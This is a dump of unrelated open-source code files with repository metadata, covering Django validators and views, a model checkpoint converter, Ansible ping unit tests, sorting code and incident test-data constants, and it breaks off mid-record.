0fcf6b7f3389d06685d40615c376dc4027e772f2
|
[
"MIT"
] | 1 |
2022-03-03T10:16:14.000Z
|
2022-03-03T10:16:14.000Z
|
furniture_store/furniture_store/web/validators.py
|
trenev/softuni-python-web-basics
|
0fcf6b7f3389d06685d40615c376dc4027e772f2
|
[
"MIT"
] | null | null | null |
furniture_store/furniture_store/web/validators.py
|
trenev/softuni-python-web-basics
|
0fcf6b7f3389d06685d40615c376dc4027e772f2
|
[
"MIT"
] | null | null | null |
from django.core.exceptions import ValidationError
def validate_min_price(value):
if value <= 0:
raise ValidationError('Price must be positive number!')
| 23.857143 | 63 | 0.742515 |
17be761c0fc0d7ada774d93be4698867fc568651
| 1,612 |
py
|
Python
|
official/cv/c3d/src/tools/ckpt_convert.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
official/cv/c3d/src/tools/ckpt_convert.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
official/cv/c3d/src/tools/ckpt_convert.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import torch
from mindspore import Tensor
from mindspore.train.serialization import save_checkpoint
from src.c3d_model import C3D
def torch_to_mindspore(torch_file_path, mindspore_file_path):
ckpt = torch.load(torch_file_path, map_location=torch.device('cpu'))
new_params_list = []
for _, v in ckpt.items():
new_params_list.append(v.numpy())
mindspore_params_list = []
network = C3D(num_classes=487)
for v, k in zip(new_params_list, network.parameters_dict().keys()):
if 'fc8' in k:
continue
mindspore_params_list.append({'name': k, 'data': Tensor.from_numpy(v)})
save_checkpoint(mindspore_params_list, mindspore_file_path)
print('convert pytorch ckpt file to mindspore ckpt file ok !')
if __name__ == '__main__':
torch_ckpt_file_path = sys.argv[1]
mindspore_ckpt_file_path = sys.argv[2]
torch_to_mindspore(torch_ckpt_file_path, mindspore_ckpt_file_path)
| 35.043478 | 79 | 0.707196 |
17fbd1cbc70a96f19c45d1dd0f121bad2c6d6e97
| 3,243 |
py
|
Python
|
python/readJson.py
|
Greakz/mdh-cmake-cubevis
|
6c64ec0e14dcdd07e69fa1f018aa7954eeeaf173
|
[
"MIT"
] | null | null | null |
python/readJson.py
|
Greakz/mdh-cmake-cubevis
|
6c64ec0e14dcdd07e69fa1f018aa7954eeeaf173
|
[
"MIT"
] | 5 |
2021-08-24T11:09:54.000Z
|
2021-08-24T21:14:15.000Z
|
python/readJson.py
|
Greakz/mdh-cmake-cubevis
|
6c64ec0e14dcdd07e69fa1f018aa7954eeeaf173
|
[
"MIT"
] | null | null | null |
def readConstants(constants_list):
constants = []
for attribute, value in constants_list.items():
constants.append({"name": attribute, "cname": "c_" + attribute, "value": value})
return constants
def readClocks(clocks_lists):
clocks = {"par": [], "seq": []}
for attribute, value in clocks_lists["par_time"].items():
clocks["par"].append({
"name": attribute,
"cname": "cp_" + attribute,
"start_str": value[0],
"cname_start_f": "start_cp_" + attribute,
"end_str": value[1],
"cname_end_f": "end_cp_" + attribute,
"cname_size_f": "size_cp_" + attribute,
})
for attribute, value in clocks_lists["seq_time"].items():
clocks["seq"].append({
"name": attribute,
"cname": "cs_" + attribute,
"start_str": value[0],
"cname_start_f": "start_cs_" + attribute,
"end_str": value[1],
"cname_end_f": "end_cs_" + attribute,
"cname_size_f": "size_cs_" + attribute,
})
return clocks
def readCubeNests(cube_nests_json):
cube_nests = []
for attribute, value in cube_nests_json.items():
cube_list = []
for clock_attr, clock_val in value.items():
cube_list.append({
"clock_mask": clock_val["clock_mask"],
"name": clock_attr,
"depth": clock_val["depth"],
"x_dim_str": clock_val["x-dim"], # array with [0] = min , [1] = max, [?2] = grid_alignment_clock
"y_dim_str": clock_val["y-dim"], # array with [0] = min , [1] = max, [?2] = grid_alignment_clock
"z_dim_str": clock_val["z-dim"], # array with [0] = min , [1] = max, [?2] = grid_alignment_clock
"cname_x_dim_start_f": "x_dim_start_" + attribute + "_" + clock_attr,
"cname_y_dim_start_f": "y_dim_start_" + attribute + "_" + clock_attr,
"cname_z_dim_start_f": "z_dim_start_" + attribute + "_" + clock_attr,
"cname_x_dim_end_f": "x_dim_end_" + attribute + "_" + clock_attr,
"cname_y_dim_end_f": "y_dim_end_" + attribute + "_" + clock_attr,
"cname_z_dim_end_f": "z_dim_end_" + attribute + "_" + clock_attr,
"cname_x_dim_jump_f": "x_dim_jump_" + attribute + "_" + clock_attr,
"cname_y_dim_jump_f": "y_dim_jump_" + attribute + "_" + clock_attr,
"cname_z_dim_jump_f": "z_dim_jump_" + attribute + "_" + clock_attr,
"cname_x_dim_size_f": "x_dim_size_" + attribute + "_" + clock_attr,
"cname_y_dim_size_f": "y_dim_size_" + attribute + "_" + clock_attr,
"cname_z_dim_size_f": "z_dim_size_" + attribute + "_" + clock_attr,
"cname_x_dim_jump_offset_f": "x_dim_jump_offset_" + attribute + "_" + clock_attr,
"cname_y_dim_jump_offset_f": "y_dim_jump_offset_" + attribute + "_" + clock_attr,
"cname_z_dim_jump_offset_f": "z_dim_jump_offset_" + attribute + "_" + clock_attr
})
cube_nests.append({
"name": attribute,
"cubes": cube_list,
})
return cube_nests
| 47.691176 | 115 | 0.5609 |
a4e0d84eac4640d28599a5d7e6360fd28fbdebd6
| 529 |
py
|
Python
|
python_lib/OmegaExpansion/onionI2C.py
|
SaschaMzH/hucon
|
830b6c5e21c2c7316c61e8afdf708066374b9b62
|
[
"BSD-3-Clause"
] | 2 |
2019-09-25T13:39:22.000Z
|
2019-09-26T10:06:13.000Z
|
python_lib/OmegaExpansion/onionI2C.py
|
SaschaMzH/hucon
|
830b6c5e21c2c7316c61e8afdf708066374b9b62
|
[
"BSD-3-Clause"
] | 44 |
2019-09-25T14:35:48.000Z
|
2021-08-20T17:26:12.000Z
|
python_lib/OmegaExpansion/onionI2C.py
|
SaschaMzH/hucon
|
830b6c5e21c2c7316c61e8afdf708066374b9b62
|
[
"BSD-3-Clause"
] | 8 |
2019-09-25T13:53:07.000Z
|
2022-02-24T19:23:44.000Z
|
import random
class OnionI2C(object):
def __init__(self):
print('[orange]I2C: init onionI2C')
def writeByte(self, devAddress, address, value):
print('[orange]I2C: write to device "%x" on address 0x%02x the value 0x%02x' % (devAddress, address, value))
def readBytes(self, devAddress, address, size):
print('[orange]I2C: read from device "%x" at address 0x%02x the amount of %d bytes' % (devAddress, address, size))
ret_list = []
for i in range(size):
ret_list.append(random.randint(0, 255))
return ret_list
| 31.117647 | 116 | 0.705104 |
a4e8793b7f82209247b7bd8e0a4d05c0afe7a245
| 145 |
py
|
Python
|
Beginner/03. Python/qr-coder/qrcoder.py
|
ankita080208/Hacktoberfest
|
2be849e89285260e7b6672f42979943ad6bbec78
|
[
"MIT"
] | 3 |
2021-03-16T16:44:04.000Z
|
2021-06-07T17:32:51.000Z
|
Beginner/03. Python/qr-coder/qrcoder.py
|
ankita080208/Hacktoberfest
|
2be849e89285260e7b6672f42979943ad6bbec78
|
[
"MIT"
] | null | null | null |
Beginner/03. Python/qr-coder/qrcoder.py
|
ankita080208/Hacktoberfest
|
2be849e89285260e7b6672f42979943ad6bbec78
|
[
"MIT"
] | 2 |
2020-10-12T15:58:02.000Z
|
2020-10-20T05:31:11.000Z
|
import pyqrcode, sys
data = sys.argv[1]
for ch in enumerate(data):
qrch = pyqrcode.create(ch[1])
qrch.png('./qrs/'+str(ch[0])+'.png', scale=6)
| 24.166667 | 46 | 0.655172 |
3505121efb46dfcafb96e1279683a59f1bb111fb
| 885 |
py
|
Python
|
volley/concurrency.py
|
shipt/py-volley
|
0114651478c8df7304d3fe3cb9f72998901bb3fe
|
[
"MIT"
] | 8 |
2022-02-24T14:59:24.000Z
|
2022-03-31T04:37:55.000Z
|
volley/concurrency.py
|
shipt/py-volley
|
0114651478c8df7304d3fe3cb9f72998901bb3fe
|
[
"MIT"
] | 3 |
2022-02-27T17:08:52.000Z
|
2022-03-18T13:11:01.000Z
|
volley/concurrency.py
|
shipt/py-volley
|
0114651478c8df7304d3fe3cb9f72998901bb3fe
|
[
"MIT"
] | 2 |
2022-02-24T15:03:07.000Z
|
2022-03-15T03:12:00.000Z
|
import asyncio
import contextvars
import functools
from typing import Any, Awaitable, Callable
from volley.util import FuncEnvelope
async def run_in_threadpool(func: Callable[..., Any], *args: Any) -> Any:
loop = asyncio.get_event_loop()
child = functools.partial(func, *args)
context = contextvars.copy_context()
func = context.run
args = (child,)
return await loop.run_in_executor(None, func, *args)
async def run_worker_function(f: FuncEnvelope, message: Any, ctx: Any) -> Any:
if f.needs_msg_ctx:
f.func = functools.partial(f.func, **{f.message_ctx_param: ctx})
if f.is_coroutine:
return await f.func(message)
else:
return await run_in_threadpool(f.func, message)
def run_async(func: Callable[..., Awaitable[Any]]) -> Callable[..., None]:
def wrapper() -> None:
asyncio.run(func())
return wrapper
| 27.65625 | 78 | 0.683616 |
35422aee7b446637d87eafdf2812c2c57a976621
| 3,884 |
py
|
Python
|
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/icx/test_icx_ping.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/icx/test_icx_ping.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/icx/test_icx_ping.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
# Copyright: (c) 2019, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible_collections.community.general.tests.unit.compat.mock import patch
from ansible_collections.community.general.plugins.modules.network.icx import icx_ping
from ansible_collections.community.general.tests.unit.modules.utils import set_module_args
from ..icx_module import TestICXModule, load_fixture
class TestICXPingModule(TestICXModule):
''' Class used for Unit Tests agains icx_ping module '''
module = icx_ping
def setUp(self):
super(TestICXPingModule, self).setUp()
self.mock_run_commands = patch('ansible_collections.community.general.plugins.modules.network.icx.icx_ping.run_commands')
self.run_commands = self.mock_run_commands.start()
def tearDown(self):
super(TestICXPingModule, self).tearDown()
self.mock_run_commands.stop()
def load_fixtures(self, commands=None):
def load_from_file(*args, **kwargs):
module = args
commands = kwargs['commands']
output = list()
for command in commands:
filename = str(command).split(' | ')[0].replace(' ', '_')
output.append(load_fixture('icx_ping_%s' % filename))
return output
self.run_commands.side_effect = load_from_file
def test_icx_ping_expected_success(self):
''' Test for successful pings when destination should be reachable '''
set_module_args(dict(count=2, dest="8.8.8.8"))
commands = ['ping 8.8.8.8 count 2']
fields = {'packets_tx': 2}
self.execute_module(commands=commands, fields=fields)
def test_icx_ping_expected_failure(self):
''' Test for unsuccessful pings when destination should not be reachable '''
set_module_args(dict(count=2, dest="10.255.255.250", state="absent"))
self.execute_module()
def test_icx_ping_unexpected_success(self):
''' Test for successful pings when destination should not be reachable - FAIL. '''
set_module_args(dict(count=2, dest="8.8.8.8", state="absent"))
self.execute_module(failed=True)
def test_icx_ping_unexpected_failure(self):
''' Test for unsuccessful pings when destination should be reachable - FAIL. '''
set_module_args(dict(count=2, dest="10.255.255.250", timeout=45))
fields = {'packets_tx': 1, 'packets_rx': 0, 'packet_loss': '100%', 'rtt': {'max': 0, 'avg': 0, 'min': 0}}
self.execute_module(failed=True, fields=fields)
def test_icx_ping_expected_success_cmd(self):
''' Test for successful pings when destination should be reachable '''
set_module_args(dict(count=5, dest="8.8.8.8", ttl=70))
commands = ['ping 8.8.8.8 count 5 ttl 70']
self.execute_module(commands=commands)
def test_icx_ping_invalid_ttl(self):
''' Test for invalid range of ttl for reachable '''
set_module_args(dict(dest="8.8.8.8", ttl=300))
commands = ['ping 8.8.8.8 ttl 300']
self.execute_module(failed=True, sort=False)
def test_icx_ping_invalid_timeout(self):
''' Test for invalid range of timeout for reachable '''
set_module_args(dict(dest="8.8.8.8", timeout=4294967296))
self.execute_module(failed=True, sort=False)
def test_icx_ping_invalid_count(self):
''' Test for invalid range of count for reachable '''
set_module_args(dict(dest="8.8.8.8", count=4294967296))
self.execute_module(failed=True, sort=False)
def test_icx_ping_invalid_size(self):
'''Test for invalid range of size for reachable '''
set_module_args(dict(dest="8.8.8.8", size=10001))
self.execute_module(failed=True, sort=False)
| 44.643678 | 129 | 0.679712 |
52cf303b394a69fea65dd94904d08bb4f6c8a0e6
| 916 |
py
|
Python
|
Algorithms/Sorting/QuickSortInPlace.py
|
baby5/HackerRank
|
1e68a85f40499adb9b52a4da16936f85ac231233
|
[
"MIT"
] | null | null | null |
Algorithms/Sorting/QuickSortInPlace.py
|
baby5/HackerRank
|
1e68a85f40499adb9b52a4da16936f85ac231233
|
[
"MIT"
] | null | null | null |
Algorithms/Sorting/QuickSortInPlace.py
|
baby5/HackerRank
|
1e68a85f40499adb9b52a4da16936f85ac231233
|
[
"MIT"
] | null | null | null |
#coding:utf-8
n = int(raw_input())
ar = map(int, raw_input().split())
def quick_sort_lomuto(ar, low, high):
if high-low < 1:
return
p = ar[high]
i = low
for j in xrange(low, high):
if ar[j] < p:
ar[j], ar[i] = ar[i], ar[j]
i += 1
ar[i], ar[high] = p, ar[i]
print ' '.join(map(str, ar))
quick_sort(ar, low, i-1)
quick_sort(ar, i+1, high)
def quick_sort_Hoare(ar, low, high):
if high > low:
p = ar[low]
i = low
j = high
while 1:
while ar[i] < p:
i += 1
while ar[j] > p:
j -= 1
if i >= j:
break
ar[i], ar[j] = ar[j], ar[i]
print ' '.join(map(str, ar))
quick_sort_Hoare(ar, low, j-1)
quick_sort_Hoare(ar, j+1, high)
quick_sort_Hoare(ar, 0, n-1)
| 19.489362 | 41 | 0.426856 |
d82eb559660e77f85696bcdf9d0fabea7101652f
| 1,316 |
py
|
Python
|
src/service/MeteorologyService.py
|
dreaming-coder/RadarSet
|
c912298d0d6058c6647986524e5d95a205b51c1d
|
[
"MIT"
] | null | null | null |
src/service/MeteorologyService.py
|
dreaming-coder/RadarSet
|
c912298d0d6058c6647986524e5d95a205b51c1d
|
[
"MIT"
] | null | null | null |
src/service/MeteorologyService.py
|
dreaming-coder/RadarSet
|
c912298d0d6058c6647986524e5d95a205b51c1d
|
[
"MIT"
] | null | null | null |
from concurrent.futures.process import ProcessPoolExecutor
from datetime import datetime
from dateutil.relativedelta import relativedelta
from type import PathLike
from utils.db.dao import MeteorologyDao, StationDao
from utils.io.JLoader import read_j
from utils.io.XLoader import get_j_files_list
__all__ = ["extract_meteorology", "compute_rain_6_min"]
def _load_j_file(file: PathLike):
month_meteorology = read_j(file)
dao = MeteorologyDao()
items = []
for i in range(len(month_meteorology)):
items.append(month_meteorology[i])
dao.add_list(items)
def extract_meteorology(num_workers: int = 4):
files = get_j_files_list()
with ProcessPoolExecutor(max_workers=num_workers) as executor:
executor.map(_load_j_file, files)
def compute_rain_6_min():
dao = StationDao()
stations = dao.query_stations()
dao = MeteorologyDao()
for station_no in stations:
start_date = datetime.strptime("2016-12-31 20:00:00", "%Y-%m-%d %H:%M:%S")
while True:
r = dao.update_rain_6min(station_no=station_no, dt=start_date)
if r < 0:
break
start_date = start_date + relativedelta(minutes=1)
if __name__ == '__main__':
_load_j_file(r"E:\硕士\大论文\RadarSet\resources\AJ\2017\53697\J53697-201706.TXT")
| 28.608696 | 82 | 0.708207 |
52092148ede78d0d5d858723a5f8ca2efafdcd29
| 1,961 |
py
|
Python
|
workshop_petstagram/workshop_petstagram/main/views/pet_photos.py
|
trenev/softuni-python-web-basics
|
0fcf6b7f3389d06685d40615c376dc4027e772f2
|
[
"MIT"
] | 1 |
2022-03-03T10:16:14.000Z
|
2022-03-03T10:16:14.000Z
|
workshop_petstagram/workshop_petstagram/main/views/pet_photos.py
|
trenev/softuni-python-web-basics
|
0fcf6b7f3389d06685d40615c376dc4027e772f2
|
[
"MIT"
] | null | null | null |
workshop_petstagram/workshop_petstagram/main/views/pet_photos.py
|
trenev/softuni-python-web-basics
|
0fcf6b7f3389d06685d40615c376dc4027e772f2
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render, redirect
from workshop_petstagram.main.forms import EditPetPhotoForm, AddPetPhotoForm
from workshop_petstagram.main.models import PetPhoto
from workshop_petstagram.main.templatetags.profiles import has_profile
def add_pet_photo(request):
if not has_profile():
return redirect('error page')
if request.method == "POST":
form = AddPetPhotoForm(request.POST, request.FILES)
if form.is_valid():
form.save()
return redirect('dashboard')
else:
form = AddPetPhotoForm()
context = {
'form': form,
}
return render(request, 'photo_create.html', context)
def edit_pet_photo(request, pk):
if not has_profile():
return redirect('error page')
photo = PetPhoto.objects.get(pk=pk)
if request.method == "POST":
form = EditPetPhotoForm(request.POST, instance=photo)
if form.is_valid():
form.save()
return redirect('pet photo details', photo.pk)
else:
form = EditPetPhotoForm(instance=photo)
context = {
'form': form,
'photo': photo,
}
return render(request, 'photo_edit.html', context)
def delete_pet_photo(request, pk):
if not has_profile():
return redirect('error page')
pet_photo = PetPhoto.objects.get(pk=pk)
pet_photo.delete()
return redirect('dashboard')
def like_pet_photo(request, pk):
if not has_profile():
return redirect('error page')
pet_photo = PetPhoto.objects.get(pk=pk)
pet_photo.likes += 1
pet_photo.save()
return redirect('pet photo details', pk)
def show_pet_photo_details(request, pk):
if not has_profile():
return redirect('error page')
pet_photo = PetPhoto.objects \
.prefetch_related('tagged_pets') \
.get(pk=pk)
context = {
'pet_photo': pet_photo
}
return render(request, 'photo_details.html', context)
| 24.209877 | 76 | 0.648649 |
876c927fe69abadda45b0210c40e8cfb5884958d
| 22,978 |
py
|
Python
|
Packs/IntegrationsAndIncidentsHealthCheck/Scripts/GetFailedTasks/test_data/constants.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/IntegrationsAndIncidentsHealthCheck/Scripts/GetFailedTasks/test_data/constants.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/IntegrationsAndIncidentsHealthCheck/Scripts/GetFailedTasks/test_data/constants.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
INCIDENTS_RESULT = [
{'ModuleName': 'InnerServicesModule', 'Brand': 'Builtin', 'Category': 'Builtin', 'ID': '', 'Version': 0, 'Type': 1,
'Contents': {
'ErrorsPrivateDoNotUse': None, 'data': [
{
'CustomFields': {'dbotpredictionprobability': 0,
'detectionsla': {'accumulatedPause': 0,
'breachTriggered': False,
'dueDate': '0001-01-01T00:00:00Z',
'endDate': '0001-01-01T00:00:00Z',
'lastPauseDate': '0001-01-01T00:00:00Z',
'runStatus': 'idle',
'sla': 20, 'slaStatus': -1,
'startDate': '0001-01-01T00:00:00Z',
'totalDuration': 0},
'remediationsla': {'accumulatedPause': 0,
'breachTriggered': False,
'dueDate': '0001-01-01T00:00:00Z',
'endDate': '0001-01-01T00:00:00Z',
'lastPauseDate': '0001-01-01T00:00:00Z',
'runStatus': 'idle',
'sla': 7200,
'slaStatus': -1,
'startDate': '0001-01-01T00:00:00Z',
'totalDuration': 0},
'timetoassignment': {'accumulatedPause': 0,
'breachTriggered': False,
'dueDate': '0001-01-01T00:00:00Z',
'endDate': '0001-01-01T00:00:00Z',
'lastPauseDate': '0001-01-01T00:00:00Z',
'runStatus': 'idle',
'sla': 0,
'slaStatus': -1,
'startDate': '0001-01-01T00:00:00Z',
'totalDuration': 0},
'urlsslverification': []}, 'ShardID': 0,
'account': '', 'activated': '0001-01-01T00:00:00Z',
'allRead': False, 'allReadWrite': False, 'attachment': None,
'autime': 1601398110261438200, 'canvases': None,
'category': '', 'closeNotes': '', 'closeReason': '',
'closed': '0001-01-01T00:00:00Z', 'closingUserId': '',
'created': '2020-09-29T16:48:30.261438285Z',
'dbotCreatedBy': 'admin', 'dbotCurrentDirtyFields': None,
'dbotDirtyFields': None, 'dbotMirrorDirection': '',
'dbotMirrorId': '', 'dbotMirrorInstance': '',
'dbotMirrorLastSync': '0001-01-01T00:00:00Z',
'dbotMirrorTags': None, 'details': '', 'droppedCount': 0,
'dueDate': '2020-10-09T16:48:30.261438285Z',
'feedBased': False, 'hasRole': False, 'id': '7',
'investigationId': '7', 'isPlayground': False,
'labels': [{'type': 'Instance', 'value': 'admin'},
{'type': 'Brand', 'value': 'Manual'}],
'lastJobRunTime': '0001-01-01T00:00:00Z',
'lastOpen': '2020-09-30T15:40:11.737120193Z',
'linkedCount': 0, 'linkedIncidents': None,
'modified': '2020-09-30T15:40:36.604919119Z',
'name': 'errors',
'notifyTime': '2020-09-29T16:48:30.436371249Z',
'occurred': '2020-09-29T16:48:30.261438058Z',
'openDuration': 62265, 'owner': '', 'parent': '',
'phase': '', 'playbookId': 'AutoFocusPolling',
'previousAllRead': False, 'previousAllReadWrite': False,
'previousRoles': None, 'rawCategory': '',
'rawCloseReason': '', 'rawJSON': '', 'rawName': 'errors',
'rawPhase': '', 'rawType': 'Unclassified', 'reason': '',
'reminder': '0001-01-01T00:00:00Z', 'roles': None,
'runStatus': 'error', 'severity': 0, 'sla': 0,
'sortValues': ['_score'], 'sourceBrand': 'Manual',
'sourceInstance': 'admin', 'status': 1,
'type': 'Unclassified', 'version': 8}, {
'CustomFields': {'dbotpredictionprobability': 0,
'detectionsla': {'accumulatedPause': 0,
'breachTriggered': False,
'dueDate': '0001-01-01T00:00:00Z',
'endDate': '0001-01-01T00:00:00Z',
'lastPauseDate': '0001-01-01T00:00:00Z',
'runStatus': 'idle',
'sla': 20,
'slaStatus': -1,
'startDate': '0001-01-01T00:00:00Z',
'totalDuration': 0},
'integrationscategories': ['Utilities',
'Utilities',
'Utilities',
'Utilities',
'Endpoint',
'Messaging',
'Data Enrichment & Threat Intelligence'],
'integrationsfailedcategories': [
'Data Enrichment & Threat Intelligence',
'Endpoint'],
'numberofentriesiderrors': 0,
'numberoffailedincidents': 0,
'remediationsla': {'accumulatedPause': 0,
'breachTriggered': False,
'dueDate': '0001-01-01T00:00:00Z',
'endDate': '0001-01-01T00:00:00Z',
'lastPauseDate': '0001-01-01T00:00:00Z',
'runStatus': 'idle',
'sla': 7200,
'slaStatus': -1,
'startDate': '0001-01-01T00:00:00Z',
'totalDuration': 0},
'timetoassignment': {
'accumulatedPause': 0,
'breachTriggered': False,
'dueDate': '0001-01-01T00:00:00Z',
'endDate': '0001-01-01T00:00:00Z',
'lastPauseDate': '0001-01-01T00:00:00Z',
'runStatus': 'idle', 'sla': 0,
'slaStatus': -1,
'startDate': '0001-01-01T00:00:00Z',
'totalDuration': 0},
'totalfailedinstances': 2,
'totalgoodinstances': 7,
'totalinstances': 9,
'unassignedincidents': [],
'urlsslverification': []}, 'ShardID': 0,
'account': '', 'activated': '0001-01-01T00:00:00Z',
'allRead': False, 'allReadWrite': False,
'attachment': None, 'autime': 1601388165826470700,
'canvases': None, 'category': '',
'closeNotes': 'Created a new incident type.',
'closeReason': '', 'closed': '0001-01-01T00:00:00Z',
'closingUserId': '',
'created': '2020-09-29T14:02:45.82647067Z',
'dbotCreatedBy': 'admin', 'dbotCurrentDirtyFields': None,
'dbotDirtyFields': None, 'dbotMirrorDirection': '',
'dbotMirrorId': '', 'dbotMirrorInstance': '',
'dbotMirrorLastSync': '0001-01-01T00:00:00Z',
'dbotMirrorTags': None, 'details': '', 'droppedCount': 0,
'dueDate': '0001-01-01T00:00:00Z', 'feedBased': False,
'hasRole': False, 'id': '3', 'investigationId': '3',
'isPlayground': False,
'labels': [{'type': 'Instance', 'value': 'admin'},
{'type': 'Brand', 'value': 'Manual'}],
'lastJobRunTime': '0001-01-01T00:00:00Z',
'lastOpen': '2020-09-30T15:40:48.618174584Z',
'linkedCount': 0, 'linkedIncidents': None,
'modified': '2020-09-30T15:41:15.184226213Z',
'name': 'Incident with error',
'notifyTime': '2020-09-29T14:09:06.048819578Z',
'occurred': '2020-09-29T14:02:45.826470478Z',
'openDuration': 686, 'owner': 'admin', 'parent': '',
'phase': '',
'playbookId': 'JOB - Integrations and Playbooks Health Check',
'previousAllRead': False, 'previousAllReadWrite': False,
'previousRoles': None, 'rawCategory': '',
'rawCloseReason': '', 'rawJSON': '',
'rawName': 'Incident with error', 'rawPhase': '',
'rawType': 'testing', 'reason': '',
'reminder': '0001-01-01T00:00:00Z', 'roles': None,
'runStatus': 'error', 'severity': 0, 'sla': 0,
'sortValues': ['_score'], 'sourceBrand': 'Manual',
'sourceInstance': 'admin', 'status': 1, 'type': 'testing',
'version': 13}, {
'CustomFields': {'dbotpredictionprobability': 0,
'detectionsla': {'accumulatedPause': 0,
'breachTriggered': False,
'dueDate': '0001-01-01T00:00:00Z',
'endDate': '0001-01-01T00:00:00Z',
'lastPauseDate': '0001-01-01T00:00:00Z',
'runStatus': 'idle',
'sla': 20,
'slaStatus': -1,
'startDate': '0001-01-01T00:00:00Z',
'totalDuration': 0},
'remediationsla': {'accumulatedPause': 0,
'breachTriggered': False,
'dueDate': '0001-01-01T00:00:00Z',
'endDate': '0001-01-01T00:00:00Z',
'lastPauseDate': '0001-01-01T00:00:00Z',
'runStatus': 'idle',
'sla': 7200,
'slaStatus': -1,
'startDate': '0001-01-01T00:00:00Z',
'totalDuration': 0},
'sourceusername': 'JohnJoe',
'timetoassignment': {
'accumulatedPause': 0,
'breachTriggered': False,
'dueDate': '0001-01-01T00:00:00Z',
'endDate': '0001-01-01T00:00:00Z',
'lastPauseDate': '0001-01-01T00:00:00Z',
'runStatus': 'idle', 'sla': 0,
'slaStatus': -1,
'startDate': '0001-01-01T00:00:00Z',
'totalDuration': 0},
'urlsslverification': []}, 'ShardID': 0,
'account': '', 'activated': '0001-01-01T00:00:00Z',
'allRead': False, 'allReadWrite': False,
'attachment': None, 'autime': 1601480646930752000,
'canvases': None, 'category': '', 'closeNotes': '',
'closeReason': '', 'closed': '0001-01-01T00:00:00Z',
'closingUserId': '',
'created': '2020-09-30T15:44:06.930751906Z',
'dbotCreatedBy': 'admin', 'dbotCurrentDirtyFields': None,
'dbotDirtyFields': None, 'dbotMirrorDirection': '',
'dbotMirrorId': '', 'dbotMirrorInstance': '',
'dbotMirrorLastSync': '0001-01-01T00:00:00Z',
'dbotMirrorTags': None, 'details': '', 'droppedCount': 0,
'dueDate': '2020-10-10T15:44:06.930751906Z',
'feedBased': False, 'hasRole': False, 'id': '48',
'investigationId': '48', 'isPlayground': False,
'labels': [{'type': 'Instance', 'value': 'admin'},
{'type': 'Brand', 'value': 'Manual'}],
'lastJobRunTime': '0001-01-01T00:00:00Z',
'lastOpen': '0001-01-01T00:00:00Z', 'linkedCount': 0,
'linkedIncidents': None,
'modified': '2020-09-30T15:46:35.843037049Z',
'name': 'Multiple Failed Logins',
'notifyTime': '2020-09-30T15:46:35.836929058Z',
'occurred': '2020-09-30T15:44:06.930751702Z',
'openDuration': 0, 'owner': 'admin', 'parent': '',
'phase': '',
'playbookId': 'Account Enrichment - Generic v2.1',
'previousAllRead': False, 'previousAllReadWrite': False,
'previousRoles': None, 'rawCategory': '',
'rawCloseReason': '', 'rawJSON': '',
'rawName': 'Multiple Failed Logins', 'rawPhase': '',
'rawType': 'Unclassified', 'reason': '',
'reminder': '0001-01-01T00:00:00Z', 'roles': None,
'runStatus': 'error', 'severity': 1, 'sla': 0,
'sortValues': ['_score'], 'sourceBrand': 'Manual',
'sourceInstance': 'admin', 'status': 1,
'type': 'Unclassified', 'version': 10}], 'total': 3},
'HumanReadable': None, 'ImportantEntryContext': None, 'EntryContext': None, 'IgnoreAutoExtract': False,
'ReadableContentsFormat': '', 'ContentsFormat': 'json', 'File': '', 'FileID': '', 'FileMetadata': None,
'System': '', 'Note': False, 'Evidence': False, 'EvidenceID': '', 'Tags': None,
'Metadata': {'id': '', 'version': 0, 'modified': '0001-01-01T00:00:00Z', 'sortValues': None, 'roles': None,
'allRead': False, 'allReadWrite': False, 'previousRoles': None, 'previousAllRead': False,
'previousAllReadWrite': False, 'hasRole': False, 'dbotCreatedBy': '', 'ShardID': 0, 'type': 1,
'created': '2020-10-03T12:39:59.908094336Z', 'retryTime': '0001-01-01T00:00:00Z', 'user': '',
'errorSource': '', 'contents': '', 'format': 'json', 'investigationId': '51', 'file': '',
'fileID': '', 'parentId': '156@51', 'pinned': False, 'fileMetadata': None,
'parentContent': '!getIncidents page="0" query="-status:closed and runStatus:error"',
'parentEntryTruncated': False, 'system': '', 'reputations': None, 'category': '', 'note': False,
